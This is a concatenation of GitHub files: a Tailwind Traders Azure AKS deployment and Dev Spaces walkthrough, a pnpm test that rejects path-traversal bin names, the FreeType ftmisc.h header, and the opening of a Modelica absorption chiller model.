To auto-generate your _gvalues_ file just go to `/Deploy/powershell` folder and from a PowerShell window, type the following:
```
.\Generate-Config.ps1 -resourceGroup <your-resource-group> -sqlPwd <sql-password> -outputFile helm\__values\<name-of-your-file>
```
The parameters that `Generate-Config.ps1` accepts are:
- `-resourceGroup`: Resource group where all Azure resources are. **Mandatory**
- `-sqlPwd`: Password of SQL Servers and PostgreSQL server. This parameter is **mandatory** because can't be read using Azure CLI
- `-forcePwd`: If `$true`, the scripts updates the SQL Server and PostgreSQL to set their password to the value of `sqlPwd`. Defaults to `$false`.
- `-outputFile`: Full path of the output file to generate. A good idea is to generate a file in `/Deploy/helm/__values/` folder as this folder is ignored by Git. If not passed the result file is written on screen.
- `-gvaluesTemplate`: Template of the _gvalues_ file to use. The parameter defaults to the `/Deploy/helm/gvalues.template` which is the only template provided.
The script checks that all needed resources exist in the resource group. If some resource is missing or there is an unexpected resource, the script exits.
Once the file is generated in the `/Deploy/helm/__values/`folder, copy the file outside the `__values` folder and rename it as `gvalues.yaml`.
> **Note:** If you don't want to edit the `helm/gvalues.yaml` file you can create a copy and name it whatever you want (i. e. `helm/gvalues-prod1.yaml`). This allows you to maintain various environments. Note that **this file contains secrets so do not push into the repo!**, you can put the file in `/Deploy/helm/__values/` folder which is added to `.gitignore` to avoid accidental pushes.
1. Create **secrets on the AKS**
Docker images are stored in an ACR (a private Docker Registry hosted in Azure).
Before deploying anything on AKS, a secret must be installed to allow AKS to connect to the ACR through a Kubernetes' service account.
To do so from a Bash terminal run the file `./create-secret.sh` with following parameters:
- `-g <group>` Resource group where AKS is
- `--acr-name <name>` Name of the ACR
- `--clientid <id>` Client id of the service principal to use
- `--password <pwd>` Service principal password
Please, note that the Service principal must be already exist. To create a service principal, you can run the command `az ad sp create-for-rbac`.
If using PowerShell, run the `.\Create-Secret.ps1` inside `powershell` folder with following parameters:
- `-resourceGroup <group>` Resource group where AKS is
- `-acrName <name>` Name of the ACR
This will create the secret in AKS **using ACR credentials**. If ACR login is not enabled, you can create a secret by using a service principal. For use an Azure service principal following additional parameters are needed:
- `-clientId <id>` Client id of the service principal to use
- `-password <pwd>` Service principal password
1. **Build** & **deploy** images to ACR
You can **manually use docker-compose** to build and push the images to the ACR. If using compose you can set following environment variables:
* `TAG`: Will contain the generated docker images tag
* `REGISTRY`: Registry to use. This variable should be set to the login server of the ACR
Once set, you can use `docker-compose build` and `docker-compose push` to build and push the images.
Additionally, there is a PowerShell script in the `Deploy/powershell` folder, named `Build-Push.ps1`. You can use this script for building and pushing ALL images to ACR. Parameters of this script are:
* resourceGroup: Resource group where ACR is. Mandatory.
* acrName: ACR name (not login server). Mandatory.
* dockerTag: Tag to use for generated images (defaults to `latest`)
* dockerBuild: If `$true` (default value) docker images will be built using `docker-compose build`.
* dockerPush: If `$true` (default value) docker images will be push to ACR using `docker-compose push`.
This script uses `az` CLI to get ACR information, and then uses `docker-compose` to build and push the images to ACR.
To build an push images tagged with v1 to an ACR named my-acr in resource group named my-rg:
```
.\Build-Push.ps1 -resourceGroup my-rg -dockerTag v1 -acrName my-acr
```
It might take around 10 minutes to complete the build process.
To just push the images (without building them before):
```
.\Build-Push.ps1 -resourceGroup my-rg -dockerTag v1 -acrName my-acr -dockerBuild $false
```
1. Deploying **Services**
> **Note**: If you want to add SSL/TLS support on the cluster (needed to use https on the web) please read following section **before installing the backend**.
To deploy the services from a Bash terminal, run the `./deploy-images-aks.sh` script with the following parameters:
- `-n <name>` Name of the deployment. Defaults to `my-tt`
- `--aks-name <name>` Name of the AKS
- `-g <group>` Name of the resource group
- `--acr-name <name>` Name of the ACR
- `--tag <tag>` Docker images tag to use. Defaults to `latest`
- `--charts <charts>` List of comma-separated values with charts to install. Defaults to `*` (all)
- `-f <values-file>`: Values file to use (defaults to `gvalues.yaml`)
If using PowerShell, you must run `.\Deploy-Images-Aks.ps1` inside `powershell` folder with following parameters:
- `-name <name>` Name of the deployment. Defaults to `my-tt`
- `-aksName <name>` Name of the AKS
- `-resourceGroup <group>` Name of the resource group
- `-acrName <name>` Name of the ACR
- `-tag <tag>` Docker images tag to use. Defaults to `latest`
- `-charts <charts>` List of comma-separated values with charts to install. Defaults to `*` (all)
- `-valueSFile <values-file>`: Values file to use (defaults to `gvalues.yaml`)
- `-tlsEnv prod|staging` If **SSL/TLS support has been installed**, you must use this parameter to enable https endpoints. Value must be `staging` or `prod` and must be the same value used when you installed SSL/TLS support. If SSL/TLS is not installed, you can omit this parameter.
This script will install all services using Helm and your custom configuration from file `gvalues.yaml`
The parameter `charts` allow for a selective installation of charts. Is a list of comma-separated values that mandates the services to deploy in the AKS. Values are:
- `pr` Products API
- `cp` Coupons API
- `pf` Profiles API
- `pp` Popular products API
- `st` Stock API
- `ic` Image classifier API
- `ct` Shopping cart API
- `mgw` Mobile API Gateway
- `wgw` Web API Gateway
So, using `charts pp,st` will only install the popular products and the stock API.
1. Deploying the **Images** to the storage account
To deploy the needed images on the Azure Storage account just run the `/Deploy&powershell/Deploy-Pictures-Azure.ps1` script, with following parameters:
-resourceGroup <name>: Resource group where storage is created
-storageName <name>: Name of the storage account
Script will create blob containers and copy the images (located in `/Deploy/tailwindtraders-images` folder) to the storage account.
1. Enabling **SSL/TLS** on the cluster (**_Optional_**)
SSL/TLS support is provided by [cert-manager](https://github.com/jetstack/cert-manager) that allows auto-provisioning of TLS certificates using [Let's Encrypt](https://letsencrypt.org/) and [ACME](https://en.wikipedia.org/wiki/Automated_Certificate_Management_Environment) protocol.
To enable SSL/TLS support, you must do it **before deploying your images**. The first step is to add cert-manager to the cluster by running `images/add-cert-manager.sh` or `images/Add-Cert-Manager.ps1`. Both scripts accept no parameters and they use helm to configure cert-manager in the cluster. **This needs to be done only once**
Then you should run `powershell/Enable-Ssl.ps1` with following parameters:
- `sslSupport`: Use `staging` or `prod` to use the staging or production environments of Let's Encrypt
- `aksName`: The name of the AKS to use
- `resourceGroup`: Name of the resource group where AKS is
- `domain`: Domain to use for the SSL/TLS certificates. Is **optional** and if not used it defaults to the public domain of the AKS. Only need to use this parameter if using custom domains
Output of the script will be something like following:
```
NAME: my-tt-ssl
LAST DEPLOYED: Fri Dec 21 11:32:00 2018
NAMESPACE: default
STATUS: DEPLOYED
RESOURCES:
==> v1alpha1/Certificate
NAME AGE
tt-cert-staging 0s
==> v1alpha1/Issuer
NAME AGE
letsencrypt-staging 0s
```
You can verify that the _issuer_ object is created using `kubectl get issuers`:
````
PS> kubectl get issuers
NAME AGE
letsencrypt-staging 4m
```
You can verify that the _certificate_ object is created using `kubectl get certificates`:
```
PS> kubectl get certificates
NAME AGE
tt-cert-staging 4m
````
The _certificate_ object is not the real SSL/TLS certificate but a definition on how get one from Let's Encrypt. The certificate itself is stored in a secret, called `letsencrypt-staging` (or `letsencrypt-prod`). You should see a secret named `tt-letsencrypt-xxxx` (where `xxxx` is either `staging` or `prod`).
```
PS> kubectl get secrets
NAME TYPE DATA AGE
acr-auth kubernetes.io/dockerconfigjson 1 2d
default-token-6tm9t kubernetes.io/service-account-token 3 3d
letsencrypt-prod Opaque 1 3h
letsencrypt-staging Opaque 1 4h
tt-letsencrypt-prod kubernetes.io/tls 2 5m
ttsa-token-rkjlg kubernetes.io/service-account-token 3 2d
```
The SSL/TLS secret names are:
- `letsencrypt-staging`: Secret for the staging _issuer_. This is NOT the SSL/TLS certificate
- `tt-letsencrypt-staging`: Secret for the staging SSL/TLS certificate.
- `letsencrypt-prod`: Secret for the prod _issuer_. This is NOT the SSL/TLS certificate
- `tt-letsencrypt-prod`: Secret for the prod SSL/TLS certificate.
At this point **the support for SSL/TLS is installed, and you can install Tailwind Traders Backend on the repo**.
> **Note:** You don't need to do this again, unless you want to change the domain of the SSL/TLS certificate. In this case you need to remove the issuer and certificate objects (using `helm delete my-tt-ssl --purge` and then reinstall again)
> **Note** Staging certificates **are not trust**, so browsers will complain about it, exactly in the same way that they complain about a self-signed certificate. The only purpose is to test all the deployment works, but in any production environment you must use the `prod` environment. Main difference is the Let's Encrypt API call rates are more limited than the staging ones.
Another way to validate your certificate deployment is doing a `kubectl describe cert tt-cert-staging` (or `tt-cert-prod`). In the `Events` section you should see that the certificate has been obtained:
```
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Normal CreateOrder 10m cert-manager Created new ACME order, attempting validation...
Normal DomainVerified 9m cert-manager Domain "e43cd6ae16f344a093dc.eastus.aksapp.io" verified with "http-01" validation
Normal IssueCert 9m cert-manager Issuing certificate...
Normal CertObtained 9m cert-manager Obtained certificate from ACME server
Normal CertIssued 9m cert-manager Certificate issued successfully
```
## Walkthrough: Deploying the website
1. ARM template is provided so that you can automate the creation of the resources for the website. Select the **Deploy to Azure** button (or right click and select the Open in new tab option) to spin up App Service, Azure Container Registry (ACR).
[](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FMicrosoft%2FTailwindTraders-Website%2Fmaster%2FDeploy%2Fdeployment.json)

1. When deploying to Azure pay attention to parameter - **Api Base Url**.
- The base url is the URL of the created Kubernetes service's **HTTP application routing domain**. Refer below image for the **Url** to be copied from your created Kubernetes service, which is deployed in the backend resource group. It defaults to the public test environment provided by Microsoft.

1. Below resources are created after the deployment.

1. To see the website, navigate to the **App Service** and click on the **URL**.


1. In order to see if the backend is working, navigate to the tabs under the website. If you are not using SSL/TLS, load the page in **_http://_** mode or click on **Load unsafe scripts** in Chrome browser.

## Walkthrough: Azure Dev Spaces
Azure Dev Spaces allow debug and develop micro services in a team environment without disturbing other people work. Every developer has its own space where changes can be deployed without impacting other people.
You will need the following to be installed -
- [Visual Studio Code installed](https://code.visualstudio.com/download).
- The [Azure Dev Spaces for VS Code](https://marketplace.visualstudio.com/items?itemName=azuredevspaces.azds), [Java Extension Pack](https://marketplace.visualstudio.com/items?itemName=vscjava.vscode-java-pack), [Java for Azure Dev Spaces (Preview)](https://marketplace.visualstudio.com/items?itemName=vscjava.vscode-java-debugger-azds) extensions for Visual Studio Code installed.
- [Azure CLI installed](/cli/azure/install-azure-cli?view=azure-cli-latest) (version greater than 2.0.62).
To enable Azure Dev Spaces on your AKS cluster, use the use-dev-spaces command to enable Dev Spaces on your AKS cluster and follow the prompts. The below command enables Dev Spaces on the AKS cluster inside the resource group and creates a Dev Space called dev. When prompted for a Kubernetes namespace to be used as a Dev Space, enter `dev`. When prompted for the parent devspace, select `None` (0).
```cmd
$ az aks use-dev-spaces -g <<ResourceGroup>> -n <<AKS>>
Installing Dev Spaces commands...
A separate window will open to guide you through the installation process.
An Azure Dev Spaces Controller will be created that targets resource '<<AKS>>' in resource group '<<ResourceGroup>>'. Continue? (y/N): y
Creating and selecting Azure Dev Spaces Controller '<<AKS>>' in resource group '<<ResourceGroup>>' that targets resource '<<AKS>>' in resource group '<<ResourceGroup>>'...2m 40s
Select a dev space or Kubernetes namespace to use as a dev space.
[1] default
Type a number or a new name: dev
Dev space 'dev' does not exist and will be created.
Select a parent dev space or Kubernetes namespace to use as a parent dev space.
[0] <none>
[1] default
Type a number: 0
Creating and selecting dev space 'dev'...1s
Managed Kubernetes cluster '<<AKS>>' in resource group '<<ResourceGroup>>' is ready for development in dev space 'dev'. Type `azds prep` to prepare a source directory for use with Azure Dev Spaces and `azds up` to run.
```
### Introduce a bug in the stock API
Let's take on the role of _Alice_, a developer who is trying to reproduce a bug in stock API that makes the API return all products out of stock.
In this scenario, comment a particular line of code in your local repository under `Source/Services/Tailwind.Traders.Stock.Api/src/main/java/Tailwind/Traders/Stock/Api/StockController.java`. You don’t have to compile after commenting the line of code.
```
response.setProductStock(stock.getStockCount());
```
### Prepare source for Dev Spaces
Deploy using Dev Spaces is done using the same Helm charts (located in `/Deploy/helm`) used in the standard deployment. You need to have a valid _gvalues.yaml_ configuration file created. From a PowerShell command line in folder `/Source` type:
```ps
.\prepare-devspaces.ps1 -file <path-to-your-gvalues-file>
```
This will copy your _gvalues_ file in `/Deploy/helm` folder with the name `gvalues.azds.yaml`. Dev spaces deployment files expect to have the _gvalues_ file in that folder with that name (**note**: File is added in `.gitignore`).
### Deploying the service account and secrets in the namespace
Run Create-Secret.ps1 inside /Deploy/powershell it will create ttsa and ACR secret related to your **namespace**.
- `-resourceGroup`: Name of the resource group **Required for this demo**.
- `-acrName`: Name of your Azure Container Registry **Required for this demo**.
- `-clientId`: Service Principal Id.
- `-password`: Service Principal Password.
- `-namespace`: Name of your namespace defined above, default is empty. **Required for this demo for example `dev`**.
### Deploy all the APIs to the dev Dev Space
The `dev` Dev Space acts as a root Dev Space, where "shared" version of code is deployed. This could be the code deployed by a CD pipeline.
To deploy, just run `azds up -d -v` from a command line, once in these folders:
- `/Source/Services/Tailwind.Traders.Cart.Api`
- `/Source/Services/Tailwind.Traders.Coupon.Api`
- `/Source/Services/Tailwind.Traders.Login.Api`
- `/Source/Services/Tailwind.Traders.PopularProduct.Api`
- `/Source/Services/Tailwind.Traders.Product.Api`
- `/Source/Services/Tailwind.Traders.Profile.Api`
- `/Source/Services/Tailwind.Traders.Stock.Api`
- `/Source/ApiGWs/Tailwind.Traders.Bff`
- `/Source/ApiGWs/Tailwind.Traders.WebBff`
Once finished, the `azds list-up` command should list all APIs in root the Dev Space `dev`:

### Deploy Web to the dev Dev Space
This needs to be done from the [TailwindTraders Web repository](https://github.com/Microsoft/TailwindTraders-Website)
Just run `azds up -d -v` from a command line in the folder:
- `/Source/Tailwind.Traders.Web`
### Try the parent Dev Space
The parent `dev` Dev Space is deployed, and ready to be tested. Run `azds list-uris --all` to get all the entry points for all APIs and the web:

When deploying on a Dev Space, all services are exposed using an ingress, even though they are internal ones; for easy testing.
Now, grab the URL of the web and paste in your browser:

### Bug Scenario
Web shows all products "out of stock":

Data seems to be correct in the database, but no matter what product id is passed, stock api always return no stock:

### Creating a child Dev Space for debugging
Alice is assigned to solve this bug, so she creates a new Dev Space for herself. Type `azds space select` and create a new Dev Space child of `dev` as this new Dev Space has to be a child Dev Space of the `dev` root Dev Space:

Alice can verify that she is in her own Dev Space by typing `azds space list` and checking the `dev/alice` Dev Space is selected (marked with an asterisk):

Great! Alice is in her own Dev Space, so all changes she deploys will be isolated to her and won't affect other developers in the same development environment. Alice gets her own entry points (URIs) to access their own versions of the services. If the service is not deployed in her Dev Space,the service deployed in the parent Dev Space (`dev`) will be used instead. Just like earlier, the command `azds list-uris` shows the URLs of the services. However, since Alice selected her `dev/alice` Dev Space, now she sees her own URIs:

### Deploy the ttsa service account on her namespace
**Before deploying any API to her own Dev Space** Alice has to deploy the `ttsa` service account. She needs to do it only once using `kubectl`. The file to deploy is `/Deploy/helm/ttsa.yaml` and it must be deployed in the namespace `alice` because that iss the name of her Dev Space:
```
kubectl apply -f Deploy\helm\ttsa.yaml -n alice
```
### Debugging the Tasks API using Visual Studio Code
It's time for Alice to use Visual Studio Code to debug the Task API. Alice goes to the her local repository folder `/Source/Services/Tailwind.Traders.Stock.Api` and opens it with Visual Studio Code. Then selects the command _Azure Dev Spaces: Prepare configuration files for Azure Dev Spaces_ from the _Command Palette_ or (Ctlr+Shift+P):

Visual Studio Code will ask for the base image to use (select the one based on Azul Zulu):

Finally, VS Code will ask for the default port. Choose 8080:

Once finished, a `launch.json` and a `tasks.json` file is generated in the `.vscode` directory. Now the debug window of VSCode should have the option "Launch Java program (AZDS)":

> **Note** If there is any problem in performing these steps, **just delete the `.vscode` folder and rename the folder `.generated.vscode` to `.vscode`**. The `.generated.vscode` folder contains the final scripts that VS Code needs for using Dev Spaces.
Alice uses this option to launch the Tasks API on her own Dev Space. This will take a while since VS Code needs to update all code in the Alice Dev Space (under the hoods a `azds up` is performed).
Visual Studio Code will show a **localhost** address in the status bar:

Alice can use this address to access the Tasks API **running on her Dev Space**. Don't be confused because of the _localhost_ address. Tasks API is not running in Alice's machine, it is running in AKS, the _localhost_ address is just tunneled. A `azds list-uris` run from command prompt will give the same info:

For starting her debug session, Alice puts a break point in the file `src/main/java/Tailwind/Traders/Stock/Api/StockController.java` in line where `stock` is checked against `null` in method `StockProduct`:

She now needs to trigger the breakpoint. There are two options:
1. Alice can use the _localhost_ address to make a direct call to the Task API. This is possible if she knows which this call is.
2. If Alice is a new developer she maybe doesn’t know what this call is, but she knows how to reproduce the error: using the web and going to the details of one product.
Using option 1 is as easy as doing a call with curl to the endpoint `/v1/stock/{product_id}`:
```
curl http://localhost:55934/v1/stock/1
```
That will trigger the endpoint and the breakpoint should be hit:

The second option (using the web) shows how Dev Spaces is powerful. **Even though Alice has not deployed the web on her Dev Space**, she gets a new URL to access the web. The command `azds list-uris` gives this new url:

Note that the URLs starts with `alice.s`. So, Alice can open a web browser and navigate to the URL of the web (`alice.s.dev.ttweb.xxxxxxx`):

She now can use the web, navigate to a product detail **and the breakpoint will be hit**:

Now Alice can use the debug tools incorporated with Visual Studio Code to find the error. Seems that some developer left a line commented, and this is the source of the error:

Now Alice can stop the debug session and just fix the code by uncommenting the line. Then **she can start a new debug session just to ensure the error is gone**. She doesn’t need to re-build the project, starting a new session will synchronize the file she changed locally and rebuild the API in her Dev Space.
Once the new debug session is started, Alice just refreshes the browser window to check if the error has disappeared:

Just to recap, Alice did all this debug session **without impacting any other developer**. The web now works as expected in her Dev Space while it is still failing in the `dev` namespace:

Alice can now commit the code and close the bug! CD pipeline will deploy the updated version of _Tasks API_ to the `dev` Dev Space, and all developers will get the fix.
Instead of rebuilding and redeploying a new container image each time code edits are made, Azure Dev Spaces incrementally recompiles code within the existing container to provide a faster edit/debug loop.
## Walkthrough: Virtual Nodes
Azure Kubernetes Service (AKS) virtual node allows you to elastically provision additional pods inside Container Instances that start in seconds. With a few clicks in the Azure portal, turn on the virtual node feature and get the flexibility and portability of a container-focused experience in your AKS environment without needing to manage the additional compute resources. And since your Azure Container Instances containers can join the same virtual network as the rest of your cluster, you can build Kubernetes services that seamlessly span pods running on virtual machines (VMs) and Azure Container Instances.
The goal of this demo is to view the AKS "virtual nodes" feature, that enables running some AKS pods in ACI.
### Key Takeaway
Virtual Nodes is a key feature of AKS that run some pods in ACI to allow for high scalability in scenarios where scalability can vary a lot. This demo starts with a "standard" deploy of Tailwind Traders Backend, and then this deploy is updated to allow some APIs to run on virtual nodes.
### Create the AKS with Virtual Nodes enabled
The **ARM script** provided with Tailwind Traders is not configured to create an AKS with virtual nodes feature enabled, and as this feature cannot be added to an AKS after its creation, **You will need to create an AKS with virtual nodes enabled**. You can:
- [Use Azure portal to create an AKS with virtual nodes enabled](https://docs.microsoft.com/en-us/azure/aks/virtual-nodes-portal)
- [Use the CLI to create an AKS with virtual nodes enabled](https://docs.microsoft.com/en-us/azure/aks/virtual-nodes-cli)
- Run the powershell script `/Deploy/demos/vnodes/Create-Aks.ps1`.
The PowerShell script has following parameters:
- `-resourceGroup`: Resource group to use. **Mandatory**. If not exists will be created.
- `-location`: Location where to create the resource group if needed. Defaults to `eastus2`
- `-aksName`: Name of the AKS cluster to create. Defaults to `ttvnodes`
### Create an ACR
Type following command to create an ACR:
```
az acr create -g <resource-group> -n <acr-name> --admin-enabled true --sku Standard
```
### Deploy Azure infrastructure
Run the `/Deploy/powershell/Deploy-Arm-Azure.ps1` script with following parameters:
- `-resourceGroup`: Resource group where to deploy all Azure infrastructure. If not exists it is created.
- `-location`: Location where create the resource group if needed
- `-deployAks`: Set it to `$false` so that the AKS is **NOT** created
### Deploy the Backend in the AKS
The next step is to deploy the backend in the AKS. Since you have already created this in the first section of this lab, you can move to the next step.
If you are following only this section of the lab, then there is a standard deployment, with no virtual nodes enabled. Follow steps described in the [Tailwind Traders Backend Deployment Guide](../../DeploymentGuide.md)
### Scenario
In this demo, a stress situation like _Black Friday_ is simulated. On a Black Friday, a lot of product queries are expected, so the Products API, needs to be able to handle high load. For this scenario, the deployment of the "Products API" will be updated to use virtual nodes.
### Updating the "Products API" deployment
Run `helm ls` command to find the _Products API_ release name. If you did not override the `-name` parameter in the `Deploy-Images-Aks.ps1` script, the release should be named `my-tt-product`.

The first update will be just to force Products API to run on virtual nodes. This is accomplished by adding some `nodeSelector` and `tolerations` to the product API pods. The exact values are in file `/Deploy/helm/vnodes/vnodes.yaml`.
**From a command line located in `/Deploy/helm` folder**, type following command to upgrade the helm release adding these new values:
```
helm upgrade --reuse-values --recreate-pods -f vnodes\vnodes.yaml my-tt-product .\products-api.
```
A `kubectl get pods -o wide` should make clear that the _Products API_ pod is running on the virtual node:

If you go to the azure portal, to the AKS associated resource group (the one that has the name like `MC_<resrource-group>_<aks-name>_<region-name>`) you should see the ACI running the products API pod:

_Congratulations! You are running the products API on virtual nodes_.
### Scaling the products API manually
You can manually scale the products API by typing:
```
kubectl scale deployment/my-tt-product-tt-products --replicas=10
```

Each pod that runs in the virtual node is an ACI instance in the `MC_XXX` resource group:

### Auto scaling the products API
Apart from scaling manually, the products API can be configured to scale automatically using a Kubernetes standard _Horizontal Pod Autoscaler (HPA)_. The HPA definition is in file `/Deploy/helm/vnodes/hpa.yaml`.
Before deploying it, just scale down the products api deployment to one pod:
```
kubectl scale deployment/my-tt-product-tt-products --replicas=1
```
This will remove all pods (and the ACI resources) except one.
To deploy the HPA, just upgrade the helm release again, but including the `hpa.yaml` file. **From a command line located in `/Deploy/helm` folder** type:
```
helm upgrade --reuse-values --recreate-pods -f vnodes\hpa.yaml my-tt-product .\products-api
```
Once upgraded, the `kubectl get hpa` should return one result:

### Start the "Black Friday" simulation
Just run the script `/Deploy/demos/vnodes/BlackFriday.ps1` with following parameters:
- `-aksName`: Name of the AKS
- `-resourceGroup`: Resource group
The script will simulate a variable load against the Products API.
After the simulation, you can cleanup the demo for exploring further -
Delete the products API release:
```
helm delete my-tt-product --purge
```
Then use the `/Deploy/powershell/Deploy-Images-Aks.ps1` with the parameter `-charts pr` to redeploy again only the products api:
```
.\Deploy-Images-Aks.ps1 -resourceGroup <resource-group> -aksName <aks-name> -acrName <acr-name> -valuesFile <path-to-gvalues-file> -charts pr -tlsEnv staging
```
## Summary
Azure makes development teams working with micro services and Kubernetes more efficient by combining the capabilities of Visual Studio and AKS Dev Spaces. Operations team become more reliable by using powerful services like Virtual Nodes to spin up instant serverless containers when you need it the most.
| {
"pile_set_name": "Github"
} |
import getBinsFromPkg from '@pnpm/package-bins'
import path = require('path')
import test = require('tape')
test('getBinsFromPkg()', async (t) => {
t.deepEqual(
await getBinsFromPkg({
bin: 'one-bin',
name: 'one-bin',
version: '1.0.0',
}, process.cwd()),
[{
name: 'one-bin',
path: path.resolve('one-bin'),
}]
)
t.end()
})
test('get bin of scoped package', async (t) => {
t.deepEqual(
await getBinsFromPkg({
bin: 'bin.js',
name: '@foo/bar',
version: '1.0.0',
}, process.cwd()),
[{
name: 'bar',
path: path.resolve('bin.js'),
}]
)
t.end()
})
test('skip dangerous bin names', async (t) => {
t.deepEqual(
await getBinsFromPkg({
name: 'foo',
version: '1.0.0',
bin: {
'../bad': './bad',
'..\\bad': './bad',
good: './good',
'~/bad': './bad',
},
}, process.cwd()),
[
{
name: 'good',
path: path.resolve('good'),
},
]
)
t.end()
})
test('skip dangerous bin locations', async (t) => {
t.deepEqual(
await getBinsFromPkg({
name: 'foo',
version: '1.0.0',
bin: {
bad: '../bad',
good: './good',
},
}, process.cwd()),
[
{
name: 'good',
path: path.resolve('good'),
},
]
)
t.end()
})
| {
"pile_set_name": "Github"
} |
/***************************************************************************/
/* */
/* ftmisc.h */
/* */
/* Miscellaneous macros for stand-alone rasterizer (specification */
/* only). */
/* */
/* Copyright 2005, 2009, 2010 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used */
/* modified and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
/***************************************************************************/
/***************************************************/
/* */
/* This file is *not* portable! You have to adapt */
/* its definitions to your platform. */
/* */
/***************************************************/
#ifndef __FTMISC_H__
#define __FTMISC_H__
/* memset */
#include FT_CONFIG_STANDARD_LIBRARY_H
#define FT_BEGIN_HEADER
#define FT_END_HEADER
#define FT_LOCAL_DEF( x ) static x
/* from include/freetype2/fttypes.h */
typedef unsigned char FT_Byte;
typedef signed int FT_Int;
typedef unsigned int FT_UInt;
typedef signed long FT_Long;
typedef unsigned long FT_ULong;
typedef signed long FT_F26Dot6;
typedef int FT_Error;
#define FT_MAKE_TAG( _x1, _x2, _x3, _x4 ) \
( ( (FT_ULong)_x1 << 24 ) | \
( (FT_ULong)_x2 << 16 ) | \
( (FT_ULong)_x3 << 8 ) | \
(FT_ULong)_x4 )
/* from include/freetype2/ftsystem.h */
typedef struct FT_MemoryRec_* FT_Memory;
typedef void* (*FT_Alloc_Func)( FT_Memory memory,
long size );
typedef void (*FT_Free_Func)( FT_Memory memory,
void* block );
typedef void* (*FT_Realloc_Func)( FT_Memory memory,
long cur_size,
long new_size,
void* block );
typedef struct FT_MemoryRec_
{
void* user;
FT_Alloc_Func alloc;
FT_Free_Func free;
FT_Realloc_Func realloc;
} FT_MemoryRec;
/* from src/ftcalc.c */
#if ( defined _WIN32 || defined _WIN64 )
typedef __int64 FT_Int64;
#else
#include "inttypes.h"
typedef int64_t FT_Int64;
#endif
static FT_Long
FT_MulDiv( FT_Long a,
FT_Long b,
FT_Long c )
{
FT_Int s;
FT_Long d;
s = 1;
if ( a < 0 ) { a = -a; s = -1; }
if ( b < 0 ) { b = -b; s = -s; }
if ( c < 0 ) { c = -c; s = -s; }
d = (FT_Long)( c > 0 ? ( (FT_Int64)a * b + ( c >> 1 ) ) / c
: 0x7FFFFFFFL );
return ( s > 0 ) ? d : -d;
}
#endif /* __FTMISC_H__ */
/* END */
| {
"pile_set_name": "Github"
} |
within Buildings.Fluid.Chillers;
model AbsorptionIndirectSteam
"Indirect steam heated absorption chiller based on performance curves"
extends Buildings.Fluid.Interfaces.FourPortHeatMassExchanger(
T1_start = 273.15+25,
T2_start = 273.15+5,
m1_flow_nominal= per.mCon_flow_nominal,
m2_flow_nominal= per.mEva_flow_nominal,
dp1_nominal = per.dpCon_nominal,
dp2_nominal = per.dpEva_nominal,
redeclare final Buildings.Fluid.MixingVolumes.MixingVolume
vol1(final V=m1_flow_nominal*tau1/rho1_nominal,
nPorts=2,
final prescribedHeatFlowRate=true),
vol2(final V=m2_flow_nominal*tau2/rho2_nominal,
nPorts=2,
final prescribedHeatFlowRate=true));
parameter Buildings.Fluid.Chillers.Data.AbsorptionIndirectSteam.Generic per
"Performance data"
annotation (choicesAllMatching= true,
Placement(transformation(extent={{60,72},{80,92}})));
parameter Modelica.SIunits.HeatFlowRate Q_flow_small = -per.QEva_flow_nominal*1E-6
"Small value for heat flow rate or power, used to avoid division by zero"
annotation(Dialog(tab="Advanced"));
Modelica.Blocks.Interfaces.BooleanInput on
"Set to true to enable the absorption chiller"
annotation (Placement(transformation(extent={{-128,2},{-100,30}}),
iconTransformation(extent={{-120,10},{-100,
30}})));
Modelica.Blocks.Interfaces.RealInput TSet(final unit="K", displayUnit="degC")
"Evaporator setpoint leaving water temperature" annotation (Placement(
transformation(extent={{-128,-38},{-100,-10}}), iconTransformation(
extent={{-120,-30},{-100,-10}})));
Modelica.Blocks.Interfaces.RealOutput P(final unit="W")
"Chiller pump power"
annotation (Placement(transformation(extent={{100,10},{120,30}}),
iconTransformation(extent={{100,-30},{120,-10}})));
Modelica.Blocks.Interfaces.RealOutput QGen_flow(final unit="W")
"Required generator heat flow rate in the form of steam"
annotation (Placement(transformation(extent={{100,-30},{120,-10}}),
iconTransformation(extent={{100,10},{120,30}})));
Modelica.Blocks.Interfaces.RealOutput QEva_flow(final unit="W")
"Evaporator heat flow rate"
annotation (Placement(transformation(extent={{100,-50},{120,-30}}),
iconTransformation(extent={{100,-96},{120,-76}})));
Modelica.Blocks.Interfaces.RealOutput QCon_flow(final unit="W")
"Condenser heat flow rate"
annotation (Placement(transformation(extent={{100,30},{120,50}}),
iconTransformation(extent={{100,74},{120,94}})));
Real PLR(min=0, final unit="1") = perMod.PLR
"Part load ratio";
Real CR(min=0, final unit="1") = perMod.CR
"Cycling ratio";
protected
BaseClasses.AbsorptionIndirectSteam perMod(
final per=per,
final Q_flow_small=Q_flow_small) "Block that computes the performance"
annotation (Placement(transformation(extent={{-52,0},{-32,20}})));
Modelica.Blocks.Sources.RealExpression QEva_flow_set(
final y=Buildings.Utilities.Math.Functions.smoothMin(
x1=m2_flow*(hEvaSet - inStream(port_a2.h_outflow)),
x2=-Q_flow_small,
deltaX=Q_flow_small/10)) "Setpoint heat flow rate of the evaporator"
annotation (Placement(transformation(extent={{-92,-28},{-72,-8}})));
Modelica.SIunits.SpecificEnthalpy hEvaSet=Medium2.specificEnthalpy_pTX(
p=port_b2.p,
T=TSet,
X=cat(
1,
port_b2.Xi_outflow,
{1 - sum(port_b2.Xi_outflow)})) "Chilled water setpoint enthalpy";
Modelica.Blocks.Sources.RealExpression TConEnt(
y=Medium1.temperature(
Medium1.setState_phX(
p = port_a1.p,
h = inStream(port_a1.h_outflow))))
"Condenser entering water temperature"
annotation (Placement(transformation(extent={{-92,-8},{-72,10}})));
Modelica.Thermal.HeatTransfer.Sensors.TemperatureSensor TEvaLvg
"Leaving evaporator temperature" annotation (Placement(transformation(
extent={{10,-10},{-10,10}},
rotation=0,
origin={-42,-40})));
HeatTransfer.Sources.PrescribedHeatFlow preHeaFloCon
"Prescribed heat flow rate for the condenser"
annotation (Placement(transformation(extent={{-10,-10},{10,10}},
rotation=0,
origin={-37,40})));
HeatTransfer.Sources.PrescribedHeatFlow preHeaFloEva
"Prescribed heat flow rate for the evaporator"
annotation (Placement(transformation(extent={{-1,-40},{19,-20}})));
equation
